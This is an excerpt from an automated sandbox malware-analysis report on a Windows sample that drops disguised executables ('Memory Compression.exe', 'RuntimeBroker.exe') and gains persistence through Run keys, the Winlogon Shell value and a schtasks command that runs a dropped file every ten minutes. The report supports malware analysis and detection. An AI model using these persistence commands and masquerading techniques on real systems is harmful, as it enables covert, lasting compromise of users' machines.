Source: C:\Recovery\Memory Compression.exe | Section loaded: profapi.dll
Source: C:\Recovery\Memory Compression.exe | Section loaded: cryptsp.dll
Source: C:\Recovery\Memory Compression.exe | Section loaded: rsaenh.dll
Source: C:\Recovery\Memory Compression.exe | Section loaded: cryptbase.dll
Source: C:\Recovery\Memory Compression.exe | Section loaded: sspicli.dll
Source: C:\Recovery\Memory Compression.exe | Section loaded: mscoree.dll
Source: C:\Recovery\Memory Compression.exe | Section loaded: kernel.appcore.dll
Source: C:\Recovery\Memory Compression.exe | Section loaded: version.dll
Source: C:\Recovery\Memory Compression.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\Memory Compression.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\Memory Compression.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\Memory Compression.exe | Section loaded: uxtheme.dll
Source: C:\Recovery\Memory Compression.exe | Section loaded: windows.storage.dll
Source: C:\Recovery\Memory Compression.exe | Section loaded: wldp.dll
Source: C:\Recovery\Memory Compression.exe | Section loaded: profapi.dll
Source: C:\Recovery\Memory Compression.exe | Section loaded: cryptsp.dll
Source: C:\Recovery\Memory Compression.exe | Section loaded: rsaenh.dll
Source: C:\Recovery\Memory Compression.exe | Section loaded: cryptbase.dll
Source: C:\Recovery\Memory Compression.exe | Section loaded: sspicli.dll
Source: C:\Recovery\Memory Compression.exe | Section loaded: ktmw32.dll
Source: C:\Recovery\Memory Compression.exe | Section loaded: rasapi32.dll
Source: C:\Recovery\Memory Compression.exe | Section loaded: rasman.dll
Source: C:\Recovery\Memory Compression.exe | Section loaded: rtutils.dll
Source: C:\Recovery\Memory Compression.exe | Section loaded: mswsock.dll
Source: C:\Recovery\Memory Compression.exe | Section loaded: winhttp.dll
Source: C:\Recovery\Memory Compression.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Recovery\Memory Compression.exe | Section loaded: iphlpapi.dll
Source: C:\Recovery\Memory Compression.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Recovery\Memory Compression.exe | Section loaded: dhcpcsvc.dll
Source: C:\Recovery\Memory Compression.exe | Section loaded: dnsapi.dll
Source: C:\Recovery\Memory Compression.exe | Section loaded: winnsi.dll
Source: C:\Recovery\Memory Compression.exe | Section loaded: rasadhlp.dll
Source: C:\Recovery\Memory Compression.exe | Section loaded: fwpuclnt.dll
Source: C:\Recovery\Memory Compression.exe | Section loaded: propsys.dll
Source: C:\Recovery\Memory Compression.exe | Section loaded: apphelp.dll
Source: C:\Recovery\Memory Compression.exe | Section loaded: dlnashext.dll
Source: C:\Recovery\Memory Compression.exe | Section loaded: wpdshext.dll
Source: C:\Recovery\Memory Compression.exe | Section loaded: edputil.dll
Source: C:\Recovery\Memory Compression.exe | Section loaded: urlmon.dll
Source: C:\Recovery\Memory Compression.exe | Section loaded: iertutil.dll
Source: C:\Recovery\Memory Compression.exe | Section loaded: srvcli.dll
Source: C:\Recovery\Memory Compression.exe | Section loaded: netutils.dll
Source: C:\Recovery\Memory Compression.exe | Section loaded: windows.staterepositoryps.dll
                          Source: C:\Recovery\Memory Compression.exeSection loaded: wintypes.dll
                          Source: C:\Recovery\Memory Compression.exeSection loaded: appresolver.dll
                          Source: C:\Recovery\Memory Compression.exeSection loaded: bcp47langs.dll
                          Source: C:\Recovery\Memory Compression.exeSection loaded: slc.dll
                          Source: C:\Recovery\Memory Compression.exeSection loaded: userenv.dll
                          Source: C:\Recovery\Memory Compression.exeSection loaded: sppc.dll
                          Source: C:\Recovery\Memory Compression.exeSection loaded: onecorecommonproxystub.dll
                          Source: C:\Recovery\Memory Compression.exeSection loaded: onecoreuapcommonproxystub.dll
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe | Section loaded: mscoree.dll
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe | Section loaded: apphelp.dll
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe | Section loaded: kernel.appcore.dll
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe | Section loaded: version.dll
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe | Section loaded: vcruntime140_clr0400.dll
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe | Section loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe | Section loaded: uxtheme.dll
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe | Section loaded: windows.storage.dll
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe | Section loaded: wldp.dll
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe | Section loaded: profapi.dll
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe | Section loaded: cryptsp.dll
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe | Section loaded: rsaenh.dll
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe | Section loaded: cryptbase.dll
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe | Section loaded: sspicli.dll
                          Source: C:\Chaindriver.exe | Section loaded: mscoree.dll
                          Source: C:\Chaindriver.exe | Section loaded: kernel.appcore.dll
                          Source: C:\Chaindriver.exe | Section loaded: version.dll
                          Source: C:\Chaindriver.exe | Section loaded: vcruntime140_clr0400.dll
                          Source: C:\Chaindriver.exe | Section loaded: ucrtbase_clr0400.dll
                          Source: C:\Chaindriver.exe | Section loaded: uxtheme.dll
                          Source: C:\Chaindriver.exe | Section loaded: windows.storage.dll
                          Source: C:\Chaindriver.exe | Section loaded: wldp.dll
                          Source: C:\Chaindriver.exe | Section loaded: profapi.dll
                          Source: C:\Chaindriver.exe | Section loaded: cryptsp.dll
                          Source: C:\Chaindriver.exe | Section loaded: rsaenh.dll
                          Source: C:\Chaindriver.exe | Section loaded: cryptbase.dll
                          Source: C:\Chaindriver.exe | Section loaded: sspicli.dll
                          Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
                          Source: C:\Windows\System32\chcp.com | Section loaded: ulib.dll
                          Source: C:\Windows\System32\chcp.com | Section loaded: fsutilext.dll
                          Source: C:\Windows\System32\w32tm.exe | Section loaded: iphlpapi.dll
                          Source: C:\Windows\System32\w32tm.exe | Section loaded: logoncli.dll
                          Source: C:\Windows\System32\w32tm.exe | Section loaded: netutils.dll
                          Source: C:\Windows\System32\w32tm.exe | Section loaded: ntmarta.dll
                          Source: C:\Windows\System32\w32tm.exe | Section loaded: ntdsapi.dll
                          Source: C:\Windows\System32\w32tm.exe | Section loaded: mswsock.dll
                          Source: C:\Windows\System32\w32tm.exe | Section loaded: dnsapi.dll
                          Source: C:\Windows\System32\w32tm.exe | Section loaded: rasadhlp.dll
                          Source: C:\Windows\System32\w32tm.exe | Section loaded: fwpuclnt.dll
                          Source: C:\Windows\System32\w32tm.exe | Section loaded: kernel.appcore.dll
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe | Section loaded: mscoree.dll
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe | Section loaded: kernel.appcore.dll
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe | Section loaded: version.dll
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe | Section loaded: vcruntime140_clr0400.dll
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe | Section loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe | Section loaded: uxtheme.dll
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe | Section loaded: windows.storage.dll
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe | Section loaded: wldp.dll
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe | Section loaded: profapi.dll
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe | Section loaded: cryptsp.dll
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe | Section loaded: rsaenh.dll
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe | Section loaded: cryptbase.dll
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe | Section loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exe | File opened: C:\Users\user\Desktop\pyvenv.cfg
                          Source: Window Recorder | Window detected: More than 3 window changes detected
                          Source: t8F7Ic986c.exe | Static PE information: Image base 0x140000000 > 0x60000000
                          Source: t8F7Ic986c.exe | Static file information: File size 7204705 > 1048576
                          Source: t8F7Ic986c.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                          Source: t8F7Ic986c.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                          Source: t8F7Ic986c.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                          Source: t8F7Ic986c.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: t8F7Ic986c.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                          Source: t8F7Ic986c.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                          Source: t8F7Ic986c.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                          Source: Binary string: C:\A\34\b\bin\amd64\select.pdb source: t8F7Ic986c.exe, 00000000.00000003.1659338173.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr
                          Source: Binary string: C:\A\34\b\bin\amd64\python39.pdb source: t8F7Ic986c.exe, 00000001.00000002.1667701805.00007FFDFB989000.00000002.00000001.01000000.00000004.sdmp
                          Source: Binary string: C:\A\34\b\bin\amd64\_bz2.pdb source: t8F7Ic986c.exe, 00000000.00000003.1655924578.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, _bz2.pyd.0.dr
                          Source: Binary string: C:\A\34\b\bin\amd64\_lzma.pdbMM source: t8F7Ic986c.exe, 00000000.00000003.1656330842.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, _lzma.pyd.0.dr
                          Source: Binary string: D:\a01\_work\26\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: t8F7Ic986c.exe, 00000000.00000003.1655768186.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000001.00000002.1668672484.00007FFE148C1000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
                          Source: Binary string: C:\A\6\b\libcrypto-1_1.pdb source: libcrypto-1_1.dll.0.dr
                          Source: Binary string: .pdbza, source: Memory Compression.exe, 00000025.00000002.1832528116.000000001B2EF000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: C:\A\34\b\bin\amd64\_hashlib.pdb source: t8F7Ic986c.exe, 00000000.00000003.1656219282.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, _hashlib.pyd.0.dr
                          Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: libcrypto-1_1.dll.0.dr
                          Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1k 25 Mar 2021built on: Tue Apr 6 11:26:02 2021 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: libcrypto-1_1.dll.0.dr
                          Source: Binary string: C:\A\34\b\bin\amd64\_socket.pdb source: t8F7Ic986c.exe, 00000000.00000003.1656458098.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, _socket.pyd.0.dr
                          Source: Binary string: 7C:\Users\user\AppData\Local\Temp\fvh1uhfy\fvh1uhfy.pdb source: Chaindriver.exe, 00000008.00000002.1728153566.000000000376F000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: BoosterX.exe, 00000004.00000000.1662947336.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp, BoosterX.exe, 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp, Chaindriver.sfx.exe, 00000007.00000000.1672760470.00007FF720B78000.00000002.00000001.01000000.0000000C.sdmp, Chaindriver.sfx.exe, 00000007.00000002.1686794737.00007FF720B78000.00000002.00000001.01000000.0000000C.sdmp, Chaindriver.sfx.exe.4.dr, BoosterX.exe.0.dr
                          Source: Binary string: C:\A\34\b\bin\amd64\_decimal.pdb## source: _decimal.pyd.0.dr
                          Source: Binary string: C:\A\34\b\bin\amd64\_lzma.pdb source: t8F7Ic986c.exe, 00000000.00000003.1656330842.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, _lzma.pyd.0.dr
                          Source: Binary string: C:\A\34\b\bin\amd64\unicodedata.pdb source: t8F7Ic986c.exe, 00000000.00000003.1659486333.000001A2123AC000.00000004.00000020.00020000.00000000.sdmp, unicodedata.pyd.0.dr
                          Source: Binary string: C:\A\34\b\bin\amd64\_decimal.pdb source: _decimal.pyd.0.dr
                          Source: t8F7Ic986c.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                          Source: t8F7Ic986c.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                          Source: t8F7Ic986c.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                          Source: t8F7Ic986c.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                          Source: t8F7Ic986c.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                          Source: C:\Chaindriver.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fvh1uhfy\fvh1uhfy.cmdline"
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe | File created: C:\\__tmp_rar_sfx_access_check_5407312
                          Source: t8F7Ic986c.exe | Static PE information: section name: _RDATA
                          Source: BoosterX.exe.0.dr | Static PE information: section name: .didat
                          Source: BoosterX.exe.0.dr | Static PE information: section name: _RDATA
                          Source: VCRUNTIME140.dll.0.dr | Static PE information: section name: _RDATA
                          Source: libcrypto-1_1.dll.0.dr | Static PE information: section name: .00cfg
                          Source: Chaindriver.sfx.exe.4.dr | Static PE information: section name: .didat
                          Source: Chaindriver.sfx.exe.4.dr | Static PE information: section name: _RDATA
                          Source: C:\Chaindriver.exe | Code function: 8_2_00007FFD9BA24B5F push ecx; retf 8_2_00007FFD9BA24B64
                          Source: C:\Chaindriver.exe | Code function: 8_2_00007FFD9BA24303 push cs; ret 8_2_00007FFD9BA2430F
                          Source: C:\Chaindriver.exe | Code function: 8_2_00007FFD9BA23980 pushfd ; retf 8_2_00007FFD9BA23981
                          Source: C:\Chaindriver.exe | Code function: 8_2_00007FFD9BE1F2DA push esp; ret 8_2_00007FFD9BE1F2DB
                          Source: C:\Chaindriver.exe | Code function: 8_2_00007FFD9BE14ABE push es; retf 8_2_00007FFD9BE14ABF
                          Source: C:\Chaindriver.exe | Code function: 8_2_00007FFD9BE1616D push ebp; ret 8_2_00007FFD9BE161D8
                          Source: C:\Chaindriver.exe | Code function: 8_2_00007FFD9BE1F16F push ebx; ret 8_2_00007FFD9BE1F170
                          Source: C:\Chaindriver.exe | Code function: 8_2_00007FFD9BE1F10E push ebp; ret 8_2_00007FFD9BE1F10F
                          Source: C:\Chaindriver.exe | Code function: 8_2_00007FFD9BE1EF6D push edi; ret 8_2_00007FFD9BE1EF71
                          Source: C:\Chaindriver.exe | Code function: 34_2_00007FFD9BA04B5F push ecx; retf 34_2_00007FFD9BA04B64
                          Source: C:\Chaindriver.exe | Code function: 34_2_00007FFD9BA04303 push cs; ret 34_2_00007FFD9BA0430F
                          Source: C:\Chaindriver.exe | Code function: 34_2_00007FFD9BA03980 pushfd ; retf 34_2_00007FFD9BA03981
                          Source: C:\Chaindriver.exe | Code function: 34_2_00007FFD9BA001CD pushad ; retf 34_2_00007FFD9BA00286
                          Source: C:\Chaindriver.exe | Code function: 34_2_00007FFD9BA000BD pushad ; iretd 34_2_00007FFD9BA000C1
                          Source: C:\Chaindriver.exe | Code function: 35_2_00007FFD9BA18992 push edx; iretd 35_2_00007FFD9BA1899D
                          Source: C:\Chaindriver.exe | Code function: 35_2_00007FFD9BA03980 pushfd ; retf 35_2_00007FFD9BA03981
                          Source: C:\Chaindriver.exe | Code function: 35_2_00007FFD9BA04B5F push ecx; retf 35_2_00007FFD9BA04B64
                          Source: C:\Chaindriver.exe | Code function: 35_2_00007FFD9BA001CD pushad ; retf 35_2_00007FFD9BA00286
                          Source: C:\Chaindriver.exe | Code function: 35_2_00007FFD9BA04303 push cs; ret 35_2_00007FFD9BA0430F
                          Source: C:\Chaindriver.exe | Code function: 35_2_00007FFD9BA000BD pushad ; iretd 35_2_00007FFD9BA000C1
                          Source: C:\Recovery\Memory Compression.exe | Code function: 36_2_00007FFD9BA03980 pushfd ; retf 36_2_00007FFD9BA03981
                          Source: C:\Recovery\Memory Compression.exe | Code function: 36_2_00007FFD9BA04B5F push ecx; retf 36_2_00007FFD9BA04B64
                          Source: C:\Recovery\Memory Compression.exe | Code function: 36_2_00007FFD9BA001CD pushad ; retf 36_2_00007FFD9BA00286
                          Source: C:\Recovery\Memory Compression.exe | Code function: 36_2_00007FFD9BA04303 push cs; ret 36_2_00007FFD9BA0430F
                          Source: C:\Recovery\Memory Compression.exe | Code function: 36_2_00007FFD9BA000BD pushad ; iretd 36_2_00007FFD9BA000C1
                          Source: C:\Recovery\Memory Compression.exe | Code function: 36_2_00007FFD9BA18992 push edx; iretd 36_2_00007FFD9BA1899D
                          Source: C:\Recovery\Memory Compression.exe | Code function: 37_2_00007FFD9B9F4B5F push ecx; retf 37_2_00007FFD9B9F4B64
                          Source: C:\Recovery\Memory Compression.exe | Code function: 37_2_00007FFD9B9F4303 push cs; ret 37_2_00007FFD9B9F430F
                          Source: C:\Recovery\Memory Compression.exe | Code function: 37_2_00007FFD9B9F3980 pushfd ; retf 37_2_00007FFD9B9F3981
                          Source: C:\Recovery\Memory Compression.exe | Code function: 37_2_00007FFD9BDEF36B push ebx; ret 37_2_00007FFD9BDEF36F
                          Source: C:\Recovery\Memory Compression.exe | Code function: 37_2_00007FFD9BDE4ABE push es; retf 37_2_00007FFD9BDE4ABF
                          Source: Chaindriver.exe.7.dr | Static PE information: section name: .text entropy: 7.541280330122405
                          Source: Memory Compression.exe.8.dr | Static PE information: section name: .text entropy: 7.541280330122405
                          Source: RuntimeBroker.exe.8.dr | Static PE information: section name: .text entropy: 7.541280330122405
                          Source: NOFqHeDosUIopsPGLT.exe.8.dr | Static PE information: section name: .text entropy: 7.541280330122405
                          Source: NOFqHeDosUIopsPGLT.exe0.8.dr | Static PE information: section name: .text entropy: 7.541280330122405

                          Persistence and Installation Behavior

                          Source: C:\Chaindriver.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create (18 identical entries in the report)
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exe | Process created: "C:\Users\user\Desktop\t8F7Ic986c.exe"
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | System file written: C:\Windows\System32\SecurityHealthSystray.exe
                          Source: C:\Chaindriver.exe | File created: C:\Users\user\Desktop\Zfmnrnxn.log
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe | File created: C:\Chaindriver.sfx.exe
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Windows\System32\SecurityHealthSystray.exe
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI75042\_lzma.pyd
                          Source: C:\Chaindriver.exe | File created: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI75042\unicodedata.pyd
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI75042\_bz2.pyd
                          Source: C:\Chaindriver.exe | File created: C:\Users\user\Desktop\HTKiXRcY.log
                          Source: C:\Chaindriver.exe | File created: C:\Recovery\NOFqHeDosUIopsPGLT.exe
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI75042\_hashlib.pyd
                          Source: C:\Recovery\Memory Compression.exe | File created: C:\Users\user\Desktop\TkRgFrOc.log
                          Source: C:\Chaindriver.sfx.exe | File created: C:\Chaindriver.exe
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI75042\python39.dll
                          Source: C:\Chaindriver.exe | File created: C:\Users\Default\Pictures\RuntimeBroker.exe
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI75042\select.pyd
                          Source: C:\Recovery\Memory Compression.exe | File created: C:\Users\user\Desktop\BXpblVtN.log
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI75042\_socket.pyd
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI75042\VCRUNTIME140.dll
                          Source: C:\Recovery\Memory Compression.exe | File created: C:\Users\user\Desktop\KGIrVxyv.log
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI75042\libcrypto-1_1.dll
                          Source: C:\Recovery\Memory Compression.exe | File created: C:\Users\user\Desktop\FnBzuKhI.log
                          Source: C:\Chaindriver.exe | File created: C:\Users\user\Desktop\PxTXHLsG.log
                          Source: C:\Chaindriver.exe | File created: C:\Users\user\Desktop\viEjRGTv.log
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI75042\_decimal.pyd
                          Source: C:\Chaindriver.exe | File created: C:\Recovery\Memory Compression.exe

                          Boot Survival

                          Source: C:\Chaindriver.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell (6 identical entries in the report)
                          Source: C:\Chaindriver.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NOFqHeDosUIopsPGLT
                          Source: C:\Chaindriver.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker
                          Source: C:\Chaindriver.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Memory Compression
                          Source: C:\Chaindriver.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Chaindriver
                          Source: C:\Chaindriver.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "NOFqHeDosUIopsPGLTN" /sc MINUTE /mo 10 /tr "'C:\Recovery\NOFqHeDosUIopsPGLT.exe'" /f
                          Source: C:\Chaindriver.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NOFqHeDosUIopsPGLT
                          Source: C:\Chaindriver.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker
                          Source: C:\Chaindriver.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Memory Compression
                          Source: C:\Chaindriver.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Chaindriver
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exe | Code function: 0_2_00007FF652ED53F0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_00007FF652ED53F0
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe | Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.sfx.exe | Process information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exe | Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\Memory Compression.exe | Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe | Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
